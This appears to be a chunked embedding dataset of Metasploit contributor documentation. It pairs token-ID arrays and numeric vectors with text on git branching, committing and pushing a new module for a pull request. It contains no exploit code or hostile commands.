18077, 1010, 4654, 1024, 9377, 3085, 1035, 5219, 1010, 23579, 1035, 6521, 5178, 12879, 25969, 2015, 1011, 1996, 2217, 12879, 25969, 2015, 2492, 5577, 1996, 2217, 3896, 3426, 2011, 1996, 18077, 2008, 1996, 5310, 2323, 2022, 5204, 1997, 1010, 4654, 1024, 10471, 1035, 2006, 1035, 9785, 1010, 25941, 1035, 1999, 1035, 15664, 1010, 4070, 1035, 5843, 12166, 1012, 2115, 18077, 2323, 2036, 2031, 1037, 4638, 4118, 2000, 2490, 1996, 4638, 3094, 1010, 2021, 2023, 2003, 11887, 1999, 2553, 2009, 1521, 1055, 2025, 2825, 1012, 1998, 2633, 1010, 1996, 18077, 4118, 2003, 2066, 2115 ]
metasploit
113.txt
3
main method. start writing your code there. an example exploit module is also available : example. rb basic git commandsmetasploit no longer uses svn for source code management. instead, we use git, so knowing some tricks with git go a long way. we ’ re not here to lecture you about how awesome git is ; we know it has a learning curve, and it ’ s not surprising to find new users making mistakes. every once a while, your git β€œ rage ” will kick in, and we understand. however, it ’ s important for you to take advantage of branching. every time you make a module or make some changes to existing code, you should not do so on the default master branch. why? because when you do a msfupdate, which is metasploit ’ s utility for updating your repository, it will do a git reset before merging the changes, and all your code goes away. another mistake people tend to do is have all the changes on master before submitting a pull request. this is a bad idea because most likely ; you ’ re submitting other crap you don ’ t intend to change, or you ’ re probably asking us to merge other unnecessary commit histories when there only needs to be one commit. thanks for contributing your module to the community, but no thanks to your crazy commit history. so as a habit, when you want to make something new, or change something, begin with a new branch that ’ s up to date to master. first off, make sure you ’ re on master. if you do a git status it will tell you what branch you ’ re currently on : $ git status # on branch upstream - master nothing to commit, working directory clean ok, now do a git pull to download the latest changes from metasploit : $ git pull already up - to - date. at this point, you ’ re ready to start a new branch. in this case, we ’ ll name our new branch β€œ my _ awesome _ branch ” : $ git checkout - b my _ awesome _ branch switched to a new branch'my _ awesome _ branch'and then you can go ahead and add that module. make sure it ’ s in the appropriate path : $ git add [ module path ] when you decide to save the changes, commit ( if there ’ s only one module, you can do git commit - a too so you don ’ t have to type the module
[ 0.3397543728351593, 0.04150669276714325, -0.11823689192533493, 0.04134896397590637, -0.07805664837360382, -0.8846476078033447, 0.3641677498817444, 0.33304736018180847, -0.09363363683223724, 0.9868423938751221, 0.011151001788675785, 0.12382829189300537, 0.5015259981155396, -0.6548409461975098, -0.07548268139362335, -0.7029985785484314, -0.6370446681976318, -0.1906285285949707, -1.8123624324798584, 0.3732486069202423, 0.4044715166091919, -0.5940254926681519, -0.9082097411155701, -0.9387248158454895, -0.5081943869590759, 0.2779029309749603, 0.6682637929916382, 0.06701541692018509, 0.403772234916687, 0.655894935131073, 0.7112130522727966, 0.05536855384707451, -0.23614192008972168, -0.8853033781051636, -0.18525803089141846, -0.20457956194877625, 0.9987429976463318, -0.40698349475860596, 0.20764443278312683, -0.6350520849227905, -0.16917389631271362, -0.740141749382019, 0.646211564540863, -1.0490307807922363, -0.9333465099334717, -0.2683022916316986, 0.05808958783745766, -0.06889612972736359, 0.365516722202301, -0.6018120050430298, 0.7769038677215576, 1.021087408065796, 0.6188061237335205, 0.3396793305873871, 0.08078216761350632, 0.03682759404182434, -0.30928492546081543, 0.2755085825920105, 0.06673432886600494, 0.8367719054222107, -0.01909881830215454, 0.4796394407749176, 0.20732764899730682, -0.8451900482177734, -0.16081774234771729, 0.6108353734016418, 0.3381797969341278, -0.01810021512210369, -0.271579772233963, 0.009804976172745228, -0.06628357619047165, 0.6727181077003479, -0.45628172159194946, -0.1475551724433899, -0.26677924394607544, 0.4512559771537781, 0.6701452136039734, 0.03055531531572342, -0.8375054597854614, 0.5111467242240906, -0.5875499248504639, 0.36560380458831787, 0.4308151602745056, 0.18148444592952728, -0.14834249019622803, -0.18201637268066406, 0.5891903638839722, 1.0538694858551025, -0.7229346036911011, -0.11821186542510986, 0.45640724897384644, 0.24426007270812988, -0.6552031636238098, 0.11351113021373749, 0.5092929005622864, 0.5922425985336304, -0.42095017433166504, 0.17921864986419678, -0.10888804495334625, -0.20681540668010712, 1.0633368492126465, 0.653759241104126, 0.4218854308128357, 0.44561049342155457, 0.1516009122133255, 0.09971234202384949, 0.42973071336746216, -0.08203479647636414, 0.5145095586776733, -0.20940163731575012, 0.04193117097020149, -0.1682150661945343, 0.2658402621746063, -0.566307008266449, -0.05475393682718277, -0.09697671234607697, 0.7298591732978821, 0.21997208893299103, -0.41482940316200256, 0.47453808784484863, 0.18306593596935272, -0.6085472702980042, -0.43382352590560913, -0.557087242603302, 0.3874495327472687, 0.45358043909072876, 0.7806172370910645, 0.37363743782043457, -0.9419326782226562, 0.3481115400791168, -0.3192026913166046, -0.2825070917606354, 0.22024188935756683, 0.31835171580314636, -0.40414050221443176, 0.6745284795761108, -0.40843692421913147, 0.1576589047908783, 0.47469380497932434, -1.2944817543029785, 0.13229019939899445, 0.46313345432281494, 0.04798730090260506, 1.1424460411071777, 1.0676894187927246, -0.45291706919670105, -0.0015663865488022566, -0.2511744201183319, 0.02435058355331421, 0.7093771696090698, -0.09916577488183975, -0.7169601917266846, 0.33737117052078247, -0.14481954276561737, -0.26512211561203003, 0.5091080665588379, -0.8967499136924744, 0.6322599053382874, -0.7305297255516052, 0.15808723866939545, 0.376303106546402, 0.8850545883178711, 0.6541342735290527, 0.47348707914352417, -0.5624844431877136, 0.27762913703918457, -0.7711294889450073, -0.596367597579956, -0.7447421550750732, 0.1618860512971878, 0.8352159857749939, -0.6342880129814148, -0.4431498050689697, -0.5599680542945862, 1.6720468997955322, 0.6104039549827576, 0.15866656601428986, 0.29678869247436523, -0.03241761401295662, 0.6297213435173035, -0.43817299604415894, 0.8777146935462952, 0.5476776361465454, 0.4733054041862488, -0.270957350730896, 0.4419507682323456, -0.1440228968858719, -0.6555741429328918, -0.1914147287607193, -0.17217741906642914, -0.5736348032951355, 0.7252426743507385, 0.06730180233716965, 0.313774973154068, 0.8986862897872925, 0.20884773135185242, -0.7542808651924133, 0.5176584720611572, -0.19840925931930542, -1.0454423427581787, -0.5928243398666382, 0.1643427312374115, 0.040022607892751694, 1.102289080619812, -0.7993945479393005, -0.3837876617908478, 0.6988105177879333, 0.4104832708835602, -0.30771976709365845, 0.11422555893659592, 0.7597604990005493, -0.3031836748123169, -0.46443095803260803, 0.3301750719547272, -0.38539570569992065, -0.1184166967868805, -0.46104347705841064, 0.7467261552810669, -0.7087123990058899, 0.5582029819488525, 0.40237700939178467, 0.42949482798576355, 0.7053004503250122, 0.06634794920682907, -0.0849933996796608, -0.5712226629257202, 0.29450350999832153, 0.27500012516975403, -0.5376864075660706, -0.11031906306743622, -0.14841359853744507, 0.3866749405860901, 0.620606005191803, 0.8665325045585632, 0.38464125990867615, -0.8578724265098572, 0.2845788598060608, 0.7406162619590759, 0.27804362773895264, 0.21277159452438354, 0.1919262856245041, 0.4226246476173401, 0.5501807332038879, 0.8487517833709717, -0.07724237442016602, 0.3878733217716217, -0.0789174810051918, -0.5182139277458191, 0.32973405718803406, 0.27196839451789856, -0.34467118978500366, 0.8209657073020935, 0.13260658085346222, -0.47261470556259155, -0.6676457524299622, -0.5673310160636902, 0.5246723294258118, 1.0435078144073486, -0.9984920024871826, -0.45364248752593994, 0.0533052496612072, 0.12146788835525513, -0.45288512110710144, 0.37461307644844055, -0.15596283972263336, 0.41813796758651733, -0.5655670762062073, 0.5104755163192749, -0.4161085784435272, -0.7763516306877136, -0.5961323380470276, 0.05979662016034126, -0.7055234313011169, -0.4284520447254181, -1.0496729612350464, 0.41942501068115234, -0.48284706473350525, 0.040117114782333374, 0.2640846371650696, -1.31368088722229, -0.7801812887191772, -0.45655274391174316, 0.5216432809829712, 0.26846593618392944, 0.29493001103401184, -0.72421795129776, -0.44844070076942444, 0.20598143339157104, -0.6375861167907715, 1.1743390560150146, -0.381664901971817, -0.1188313364982605, -0.48010244965553284, -0.051442090421915054, 0.4195743501186371, -0.057046595960855484, 0.49828532338142395, -0.06667130440473557, -0.5088973045349121, 0.17624832689762115, 0.042137984186410904, -0.029909029603004456, 0.7967071533203125, -0.01752905547618866, -0.05328206717967987, 0.13704435527324677, -0.010331792756915092, -0.32330596446990967, 0.8282548785209656, 0.5684173703193665, -0.9653580784797668, 0.3164140284061432, -0.66358882188797, 0.4933525025844574, -0.5016430020332336, 0.1429135650396347, 0.5022991299629211, 0.31422752141952515, 0.11352358758449554, -0.18525724112987518, -0.021393120288848877, -0.34768474102020264, -0.0605757050216198, 0.3094635307788849, -0.28019359707832336, 0.37986916303634644, 0.027459586039185524, -1.3771257400512695, 0.6625452041625977, -0.20964296162128448, -0.41696691513061523, -0.24108609557151794, -0.04805871471762657, 0.6801829934120178, 0.37187719345092773, -0.024984555318951607, 0.02796231023967266, -0.5207120180130005, 0.1604834944009781, -0.15249469876289368, -0.2167869508266449, -0.456599622964859, 0.7848680019378662, -0.2057185173034668, -0.4178774952888489, 0.23223933577537537, 0.1367759257555008, -0.3322635293006897, -0.3773210346698761, -0.1759520322084427, 0.3182596266269684, 0.16127710044384003, 0.18462909758090973, 0.9300630688667297, 0.15568307042121887, 0.7846132516860962, 0.03178340941667557, -0.12639586627483368, 0.3412359654903412, 0.22599071264266968, 0.47034960985183716, 0.48336291313171387, -0.4068897068500519, 0.5057987570762634, -0.6663848161697388, -0.030740931630134583, -0.13204137980937958, 0.30441921949386597, 0.3128153681755066, -0.14484286308288574, 1.1173832416534424, -0.6000909209251404, -0.13139323890209198, 0.562381386756897, -0.0858231633901596, -0.3176306188106537, -0.03238404169678688, 0.7509218454360962, 0.5114564895629883, -0.07148318737745285, -0.1701282262802124, -0.318633109331131, -0.07308515161275864, 0.26847681403160095, 0.3383520245552063, -0.13647787272930145, -0.8795152902603149, -0.5765816569328308, -0.5208753943443298, -0.5402135252952576, -0.6477448344230652, -0.05363326147198677, 0.6038370728492737, -0.7756421566009521, -0.6129065155982971, -0.8632999062538147, 0.7853742241859436, 0.8337620496749878, 0.9883174896240234, 0.6918694972991943, 0.24351197481155396, -0.26870039105415344, -0.37969520688056946, 0.3529603183269501, 0.4136371910572052, 0.17189961671829224, -0.14829911291599274, 0.9751453995704651, 0.12482653558254242, 0.4941050410270691, 0.29479020833969116, 0.2634797990322113, 0.10297153890132904, 0.16920524835586548, 0.1447969675064087, -0.5360562801361084, -0.5739916563034058, -0.49324584007263184, 0.31344255805015564, 0.0021886734757572412, -1.1806890964508057, -0.19124315679073334, -0.1447891891002655, 0.7244669795036316, 0.37724748253822327, -0.8802077770233154, -0.4628845155239105, -0.5285604596138, 0.11769247055053711, 0.46515092253685, 0.4422132968902588, -0.7108365297317505, -0.16027075052261353, -0.4420454204082489, -1.0672547817230225, -0.3363841474056244, 0.5425691604614258, 0.35124194622039795, 0.11922997981309891, -0.6082813143730164, -0.46421757340431213, -0.34133827686309814, -0.08451013267040253, -1.0215733051300049, 0.04259451478719711, -0.11522858589887619, 0.10263428837060928, 0.3335403800010681, 0.05869203805923462, -0.5554785132408142, 0.292494535446167, -0.5971900820732117, 0.1015591025352478, -0.8004359006881714, 0.38895565271377563, -0.15501366555690765, 0.09034017473459244, 0.44660478830337524, 0.2781035602092743, -0.26495012640953064, 0.3172586262226105, -0.25053149461746216, 0.03220716118812561, -0.2667407691478729, 0.0201152004301548, 0.279151052236557, 0.008738777600228786, -0.9026586413383484, 0.9229240417480469, 0.46392467617988586, -0.27358609437942505, 0.40041252970695496, -0.44654619693756104, -0.20121145248413086, 0.43277448415756226, -1.021120309829712, 0.7382209300994873, 0.2574133574962616, -0.018578054383397102, -0.3062727153301239, -0.5989192128181458, 0.5491780042648315, 0.028719861060380936, 0.14012490212917328, -0.9815329909324646, -0.4092240631580353, 0.40276360511779785, -0.039398498833179474, 0.03104340471327305, 0.43286100029945374, -0.27516600489616394, -0.09264317154884338, -0.576604425907135, 0.35794341564178467, -0.23032301664352417, -0.6717937588691711, -0.3767572045326233, -0.24523010849952698, 0.23064151406288147, 0.21420273184776306, 0.34209293127059937, -0.2473953366279602, 0.18172289431095123, 0.3779986798763275, -0.35018980503082275, 0.1327446699142456, -1.1487247943878174, -0.28345587849617004, -0.4646914005279541, 0.468330979347229, -0.6673561930656433, -0.5158312916755676, -0.35046955943107605, 0.25119179487228394, 0.08573544770479202, 0.4260140359401703, 0.41749995946884155, -0.5681743621826172, -0.8073865175247192, 0.9308211207389832, -0.5446857810020447, -0.2189866304397583, 0.2304607480764389, -0.06397652626037598, -0.04496748745441437, -0.027338530868291855, -0.21706055104732513, -0.3541841506958008, -1.3635801076889038, -0.850928008556366, -0.2609226107597351, -0.4340784251689911, 0.027682466432452202, -0.23028571903705597, -0.5000415444374084, -0.3130654990673065, 0.8652656674385071, 0.3030887544155121, -1.8453012704849243, 0.4380452036857605, 0.07774544507265091, 0.4074055254459381, -0.2958105504512787, 0.3907668888568878, 0.03935376554727554, -0.6798864603042603, -0.3328413963317871, 0.6136834621429443, -0.004769692663103342, -0.14413176476955414, -0.5267059206962585, 0.27958807349205017, -0.1630719006061554, 0.7780441641807556, -0.001878683571703732, -0.3943300247192383, -0.38091662526130676, 0.2582678198814392, -0.23369057476520538, 1.0886445045471191, -0.17825885117053986, 0.589857816696167, -0.02661779522895813, 0.5110682249069214, -0.16456983983516693, -0.1372484415769577, -0.48225289583206177, 0.5015456676483154, 0.47822296619415283, -0.8092695474624634, 0.0445275641977787, 0.07560814172029495, 0.6782155632972717, 0.3524303436279297, -0.3424898684024811, -0.1445939838886261, 0.7335391640663147, -0.714893102645874, -1.0187604427337646, 0.39601072669029236, 0.14758488535881042, -0.29806143045425415, 0.4013085961341858, -0.028359828516840935, 1.1003497838974, -0.897877037525177, 0.1782534122467041, 1.0677388906478882, 0.7411597967147827, 0.9276661276817322, -0.7981926202774048, 0.5126901865005493, 0.4274607002735138, 0.11891641467809677, 0.947917640209198, -0.13084395229816437, -0.3288460969924927, 0.047532469034194946, 0.05721244588494301, 0.05606168508529663, -0.6218408942222595, -0.3167489171028137, 0.11468546837568283, -0.15737056732177734, 0.48736074566841125, -0.6764146089553833, -0.615863561630249, -0.16065825521945953, 0.19915910065174103, -0.08957549929618835, 0.040232639759778976, 0.5644240379333496, 0.2983040511608124, 0.15571948885917664, -0.4910919964313507, 0.385598361492157, -0.313753217458725, -0.10610374063253403, 0.7864469289779663, 0.6056047081947327, -0.2742726504802704, 0.0035192742943763733, 0.5382359027862549, -1.1490330696105957, -0.593479573726654, -0.8554288744926453, 0.09177271276712418, -0.1980307400226593, -0.6042498350143433, -0.15215210616588593, 0.4165349304676056, 0.4703422486782074, 0.14914830029010773, 0.7440246939659119, -0.17150487005710602, 0.1649470031261444, -0.4392302334308624, -0.1421978771686554, 0.5237617492675781, 0.19854636490345, 0.04392304643988609, -0.24394649267196655, -0.5368480682373047, -0.9000644683837891, 0.6564778089523315, 0.29184743762016296, 0.7724956274032593, 1.1749517917633057, 0.4780161678791046, 0.4117441475391388, 0.3229924142360687, 0.3160589039325714, 0.3209075927734375, -0.07971043884754181, 0.4517858624458313, 0.3818877935409546, -0.1571139544248581, -0.39683449268341064, -0.061782874166965485, -0.5998141169548035, -0.1492367535829544, 0.17503942549228668, -0.18956124782562256, -0.13948121666908264, -0.24403487145900726, -0.044775042682886124, -0.10431728512048721, -0.7768648862838745, -0.38901421427726746, -0.7491720914840698, -0.09955509752035141, 0.6049914360046387, -0.046082839369773865, -0.16000942885875702, -0.11247788369655609, -0.1840609610080719, -0.7117404341697693, -0.8444152474403381, 0.9484231472015381, -0.094793900847435, -0.25412946939468384, -0.680834949016571, 0.4601743519306183, -0.7105402946472168, -0.2049022763967514, -0.4954680800437927, 0.09039688110351562, -0.9505242109298706, -0.5090992450714111, -0.21084535121917725, 0.2661530077457428, -0.46075427532196045, 0.48348748683929443, -0.23036976158618927, -0.08912406116724014, -0.0564703531563282, -0.766201913356781, 0.23816776275634766, 0.6422401666641235, -0.23452244699001312, -0.07030487060546875, -0.18402676284313202, 0.10354316979646683, 0.6802971363067627, -1.1677470207214355, 0.7569718956947327, -0.3247494399547577, 0.39865896105766296, 0.22243128716945648, 0.30027177929878235, -0.7088064551353455, -0.2512620985507965, -0.14449326694011688, -0.3895043432712555, -0.10602562129497528, -0.044138602912425995, 0.04919510707259178, -0.3476305603981018, -0.5130361318588257, 0.04352816939353943, 0.5867738723754883, 0.29075878858566284, -0.2903801500797272, -0.5295077562332153, 0.9144972562789917, 0.22321400046348572, -0.4430505335330963, -0.25167372822761536, 0.296134889125824, 0.32107993960380554, -0.11278557777404785, -0.046192023903131485, 0.30208829045295715, -0.6160326600074768, -0.25191402435302734, -0.4564917981624603, 0.34104540944099426, -0.216748908162117, -0.07159733027219772, 0.22526541352272034, 0.8169364333152771, 0.6105602979660034, -0.6025868058204651, -0.23970088362693787, -0.266378253698349, -0.5175389647483826, -0.12051654607057571, -1.2975059747695923, 0.08806851506233215, -0.2529374361038208, -0.3591458201408386, -0.028109893202781677, -0.2701382637023926, 0.06279346346855164, -0.5976927876472473, -0.1869141310453415, 0.2971540689468384, -0.251298189163208, -0.5258878469467163, -0.013712816871702671, 0.891706645488739, -0.963954508304596, -0.4900889992713928, -0.0670550987124443, 0.18272237479686737, 0.0535457581281662, -0.8631244897842407, -0.07007424533367157, 0.1537572145462036, -0.016955720260739326, -0.20362822711467743, -0.19592171907424927, 0.16978958249092102, -0.3221665620803833, 0.3801916837692261, -0.2681565582752228, 0.3223113715648651, -0.5175582766532898, 0.8558856844902039, -0.3152661919593811, 0.5511876940727234, -0.3355158567428589, -0.0576055645942688, -0.04347468167543411, 0.5519474744796753, -0.30983030796051025, 0.460368812084198, -0.2988209128379822, 0.148686483502388, 1.2517353296279907, 0.6810607314109802, 0.45014700293540955, -0.430846244096756, -0.0030773559119552374, 0.24002298712730408, 0.1433570683002472, 0.34128236770629883, 0.6306167244911194, 0.17880238592624664, -0.039167530834674835, 0.024020608514547348, -0.48765483498573303, -0.44532880187034607, -0.13700011372566223, -0.6313570141792297, -0.5897143483161926, -0.43393221497535706, 0.024058662354946136, -0.33083295822143555, -0.5609896183013916, -0.4989694356918335, 0.14686840772628784, -0.2059100866317749, 0.3344842791557312, -0.45836207270622253, -0.5098227858543396, 0.5311084389686584, -0.4412628710269928, 0.7440427541732788, 0.8656341433525085, -0.09405820071697235, 0.4168843924999237, 0.009139135479927063, -0.4855670928955078, 0.1745298206806183, 1.5425149202346802, 0.18069417774677277, -0.16203667223453522, 0.5309154987335205, 0.20065289735794067, 0.45294079184532166, 0.09402547776699066, 0.4603230357170105, -0.22457356750965118, 0.2591680884361267, -0.20938211679458618, -0.5962649583816528, -0.024026772007346153, -0.04420707747340202, 0.0909542515873909, 0.22537784278392792, 0.3143474757671356, -0.660376250743866, 0.7306304574012756, -0.7527036070823669, 0.43738430738449097, 0.25320178270339966, 0.2861316502094269, 0.32411158084869385, -0.5780446529388428, -0.9237151741981506, 0.17116448283195496, 0.3229064345359802, 1.1431467533111572, 0.18248818814754486, 0.5866525769233704, -0.07387205213308334, 0.18536046147346497, 0.6131604909896851, -0.0036523842718452215, -0.1582396924495697, -0.3408014476299286, -0.14274634420871735, -0.45552876591682434, 0.8049871921539307, -0.9503475427627563, 0.14333640038967133, 0.04651263728737831, 0.007898623123764992, -0.3695463538169861, 0.25704246759414673, -0.6153133511543274, -0.724144458770752, 0.5049116015434265, -0.19887889921665192, -0.6166906356811523, -0.33552730083465576, 0.4824797213077545, 0.08573698252439499, 0.6608904004096985, -0.14303188025951385, -0.1121053695678711, -0.5391791462898254, 0.07435432821512222, -0.6042565107345581, 0.9282281994819641, -0.344283789396286, 0.10915772616863251, -0.07846950739622116, -0.8881798386573792, -0.05103997141122818, -0.5412254929542542, -0.8324973583221436, -0.5170921087265015, 1.0855144262313843, -0.48661261796951294, 0.6431828737258911, 0.21444383263587952, -0.739355206489563, -0.08163391053676605, 0.29776766896247864, 0.5232210159301758, -0.36502042412757874, 0.7691550850868225, 0.1764405220746994, 0.1072116568684578, 0.35612979531288147, -0.23311980068683624, 0.8181041479110718, -0.3348095417022705, -0.3856683373451233, -0.065107062458992, -0.48852381110191345, -0.3069382905960083, -0.6125290393829346, -0.13024209439754486, 0.63455730676651, 0.42994290590286255, -0.2807821035385132, -0.7102459073066711, -0.6076235175132751, -1.1444801092147827, -0.6479774713516235, -0.6190407872200012, 0.44749531149864197, 0.42240816354751587, 0.28128719329833984, 0.6500446200370789, -1.1390475034713745, 4.221655368804932, 0.5185813307762146, 0.23458552360534668, -0.03283208608627319, 0.3634481132030487, 0.975994884967804, 0.874028205871582, -0.26209813356399536, 0.10412818193435669, 0.05784660950303078, -0.10154367983341217, -0.5348625183105469, 0.4043468236923218, 0.5365267395973206, 0.4632190763950348, 0.3635404407978058, -0.5754779577255249, 0.1817595511674881, -0.5396519899368286, -0.710127055644989, -1.0618600845336914, -0.00017177770496346056, -0.08647742867469788, 0.4013998210430145, 0.19215041399002075, -0.12155327200889587, 0.31177639961242676, -0.9464384913444519, 0.02741830237209797, -0.18525703251361847, 0.2270992249250412, -0.030715130269527435, -0.07245486229658127, -0.42648211121559143, -0.34128138422966003, -0.01550755463540554, -0.674395740032196, 0.031212346628308296, -0.38007351756095886, -0.04259086400270462, 0.4647597670555115, 0.2857123911380768, -0.7731220722198486, 0.03909821808338165, 0.41852205991744995, 0.7835865616798401, -0.6940231323242188, 0.560538649559021, 0.8493022918701172, -1.0910545587539673, 0.1273535043001175, 0.6924844980239868, 0.7448751330375671, -0.12039100378751755, -0.8096544146537781, 0.043914128094911575, 0.6674952507019043, -0.11951285600662231, 0.0036500259302556515, -0.11494874209165573, -0.10204873979091644, -0.23125405609607697, 0.2689737379550934, 0.2738286554813385, -0.5950120091438293, 0.6141631603240967, -0.2539311945438385, 0.4241890609264374, -0.17503012716770172, 0.2802797853946686, -0.753803014755249, 0.384226530790329, -0.6997262835502625, -0.9838868975639343, 0.7776111960411072, -0.1899821013212204, -0.07132965326309204, 0.15606866776943207, 0.915120542049408, -0.48215386271476746, -0.9731303453445435, -0.45265844464302063, -0.9598439931869507, 0.22095102071762085, 0.3757517337799072, 1.0383388996124268, -0.039010994136333466, -0.4759584069252014, 0.22253750264644623, 0.7050982117652893, 0.40087106823921204, 0.3838242292404175, -0.4736798405647278, 0.4280087649822235, 0.094906285405159 ]
[ 2364, 4118, 1012, 2707, 3015, 2115, 3642, 2045, 1012, 2019, 2742, 18077, 11336, 2003, 2036, 2800, 1024, 2742, 1012, 21144, 3937, 21025, 2102, 10954, 11368, 3022, 24759, 28100, 2053, 2936, 3594, 17917, 2078, 2005, 3120, 3642, 2968, 1012, 2612, 1010, 2057, 2224, 21025, 2102, 1010, 2061, 4209, 2070, 12225, 2007, 21025, 2102, 2175, 1037, 2146, 2126, 1012, 2057, 1521, 2128, 2025, 2182, 2000, 8835, 2017, 2055, 2129, 12476, 21025, 2102, 2003, 1025, 2057, 2113, 2009, 2038, 1037, 4083, 7774, 1010, 1998, 2009, 1521, 1055, 2025, 11341, 2000, 2424, 2047, 5198, 2437, 12051, 1012, 2296, 2320, 1037, 2096, 1010, 2115, 21025, 2102, 1523, 7385, 1524, 2097, 5926, 1999, 1010, 1998, 2057, 3305, 1012, 2174, 1010, 2009, 1521, 1055, 2590, 2005, 2017, 2000, 2202, 5056, 1997, 23346, 1012, 2296, 2051, 2017, 2191, 1037, 11336, 2030, 2191, 2070, 3431, 2000, 4493, 3642, 1010, 2017, 2323, 2025, 2079, 2061, 2006, 1996, 12398, 3040, 3589, 1012, 2339, 1029, 2138, 2043, 2017, 2079, 1037, 5796, 11263, 17299, 3686, 1010, 2029, 2003, 18804, 13102, 4135, 4183, 1521, 1055, 9710, 2005, 2039, 16616, 2115, 22409, 1010, 2009, 2097, 2079, 1037, 21025, 2102, 25141, 2077, 16468, 1996, 3431, 1010, 1998, 2035, 2115, 3642, 3632, 2185, 1012, 2178, 6707, 2111, 7166, 2000, 2079, 2003, 2031, 2035, 1996, 3431, 2006, 3040, 2077, 12040, 3436, 1037, 4139, 5227, 1012, 2023, 2003, 1037, 2919, 2801, 2138, 2087, 3497, 1025, 2017, 1521, 2128, 12040, 3436, 2060, 10231, 2017, 2123, 1521, 1056, 13566, 2000, 2689, 1010, 2030, 2017, 1521, 2128, 2763, 4851, 2149, 2000, 13590, 2060, 14203, 10797, 15215, 2043, 2045, 2069, 3791, 2000, 2022, 2028, 10797, 1012, 4283, 2005, 8020, 2115, 11336, 2000, 1996, 2451, 1010, 2021, 2053, 4283, 2000, 2115, 4689, 10797, 2381, 1012, 2061, 2004, 1037, 10427, 1010, 2043, 2017, 2215, 2000, 2191, 2242, 2047, 1010, 2030, 2689, 2242, 1010, 4088, 2007, 1037, 2047, 3589, 2008, 1521, 1055, 2039, 2000, 3058, 2000, 3040, 1012, 2034, 2125, 1010, 2191, 2469, 2017, 1521, 2128, 2006, 3040, 1012, 2065, 2017, 2079, 1037, 21025, 2102, 3570, 2009, 2097, 2425, 2017, 2054, 3589, 2017, 1521, 2128, 2747, 2006, 1024, 1002, 21025, 2102, 3570, 1001, 2006, 3589, 13909, 1011, 3040, 2498, 2000, 10797, 1010, 2551, 14176, 4550, 7929, 1010, 2085, 2079, 1037, 21025, 2102, 4139, 2000, 8816, 1996, 6745, 3431, 2013, 18804, 13102, 4135, 4183, 1024, 1002, 21025, 2102, 4139, 2525, 2039, 1011, 2000, 1011, 3058, 1012, 2012, 2023, 2391, 1010, 2017, 1521, 2128, 3201, 2000, 2707, 1037, 2047, 3589, 1012, 1999, 2023, 2553, 1010, 2057, 1521, 2222, 2171, 2256, 2047, 3589, 1523, 2026, 1035, 12476, 1035, 3589, 1524, 1024, 1002, 21025, 2102, 4638, 5833, 1011, 1038, 2026, 1035, 12476, 1035, 3589, 7237, 2000, 1037, 2047, 3589, 1005, 2026, 1035, 12476, 1035, 3589, 1005, 1998, 2059, 2017, 2064, 2175, 3805, 1998, 5587, 2008, 11336, 1012, 2191, 2469, 2009, 1521, 1055, 1999, 1996, 6413, 4130, 1024, 1002, 21025, 2102, 5587, 1031, 11336, 4130, 1033, 2043, 2017, 5630, 2000, 3828, 1996, 3431, 1010, 10797, 1006, 2065, 2045, 1521, 1055, 2069, 2028, 11336, 1010, 2017, 2064, 2079, 21025, 2102, 10797, 1011, 1037, 2205, 2061, 2017, 2123, 1521, 1056, 2031, 2000, 2828, 1996, 11336 ]
metasploit
113.txt
4
path. note - a really means everything ) : $ git commit [ module path ] when you ’ re done, push your changes, which will upload your code to your remote branch β€œ my _ awesome _ branch ”. you must push your changes in order to submit the pull request or share it with others on the internet. $ git push origin my _ awesome _ branch referencesurl / blob / master / lib / msf / core / exploit. rb [SEP]
[ 0.36099758744239807, 0.4741438627243042, -0.9667525291442871, -0.5048099756240845, -0.5133690237998962, -1.0871963500976562, 0.497557133436203, -0.10432811826467514, 0.46650952100753784, 1.0310918092727661, -0.2094796746969223, 0.6060896515846252, 0.6367353200912476, -0.5352607369422913, 0.12154067307710648, -0.3305686414241791, 0.41413915157318115, -0.5849822759628296, -1.1441348791122437, 0.47518593072891235, 0.23879636824131012, -0.35764962434768677, -1.139035940170288, -0.008038502186536789, -0.05172915756702423, 0.6112833023071289, 0.4008864462375641, -0.10367137938737869, 1.0404452085494995, 0.8765360116958618, -0.511652946472168, -0.051806606352329254, -0.23302140831947327, -0.7909873127937317, -0.07403144240379333, -0.2916722297668457, 0.3320799171924591, -0.3212006092071533, -0.43499767780303955, -0.9678870439529419, -0.5354448556900024, -0.19857707619667053, 0.37287670373916626, -0.335091769695282, -1.3985962867736816, 0.18664157390594482, 0.2060510218143463, -0.08258625864982605, 0.6311199069023132, 0.05507202446460724, 0.6634911894798279, 1.432281732559204, 0.1255268156528473, 0.12580561637878418, 0.3054550290107727, 0.3924270570278168, -0.006849120371043682, -0.1505025178194046, 0.10274779051542282, 0.43211522698402405, -0.0645836591720581, 0.3961581289768219, 0.08856891095638275, -0.6897144913673401, 0.44043558835983276, 0.8319804668426514, -0.8560808300971985, 0.04352264478802681, -0.35757726430892944, -0.28434276580810547, 0.20954464375972748, 0.329149067401886, 0.033736295998096466, -0.7549639940261841, -0.5660902261734009, 0.21470610797405243, 0.7472922205924988, 0.35327231884002686, -0.18911857903003693, 1.1935473680496216, -0.3060568571090698, 1.0802379846572876, 0.7117442488670349, 0.30572909116744995, -0.8250898122787476, -0.5530762076377869, 0.46758610010147095, -0.26615676283836365, -0.4822690486907959, -0.32224562764167786, 0.11176382005214691, 0.4650460481643677, -0.20702312886714935, 0.4206443130970001, 0.4083966314792633, 0.91925448179245, -0.8383215665817261, 0.1923757791519165, -0.017405066639184952, 0.25424662232398987, 0.7830606698989868, 0.5755048394203186, -0.08552825450897217, 0.06245148926973343, -0.2058691382408142, -0.1326875239610672, 0.7722997069358826, -0.3028644323348999, 0.6420437693595886, -0.4034719169139862, 0.1761864870786667, -0.12021530419588089, 0.18608197569847107, -0.12002594023942947, -0.12734666466712952, -0.5281778573989868, -0.17420171201229095, 0.7063566446304321, -0.7852022051811218, -0.5862672924995422, 1.1200191974639893, -0.4323371648788452, 0.17267166078090668, -0.4399404227733612, -0.6817348003387451, 0.05555228143930435, 0.06214003264904022, 0.6726572513580322, -0.1814166009426117, -0.28742173314094543, -0.32995128631591797, -0.7490545511245728, -0.6634805798530579, 0.34366488456726074, -0.6224595904350281, 0.48160213232040405, -0.9693645238876343, -0.09296005219221115, 0.5420042276382446, -0.8765437006950378, 0.10589738190174103, 0.04979825019836426, 0.45988336205482483, 0.5766946077346802, 1.2696073055267334, -0.048601746559143066, -0.4693209230899811, 0.22035086154937744, 0.012110214680433273, 0.40826570987701416, -0.3947194516658783, -0.8265299201011658, -0.05376371741294861, 0.24779486656188965, -0.1334940493106842, 0.7659974098205566, 